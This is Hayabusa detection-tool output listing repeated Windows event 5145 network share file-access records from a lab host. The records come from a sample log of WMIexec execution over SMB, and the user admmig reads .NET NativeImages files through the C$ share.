2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
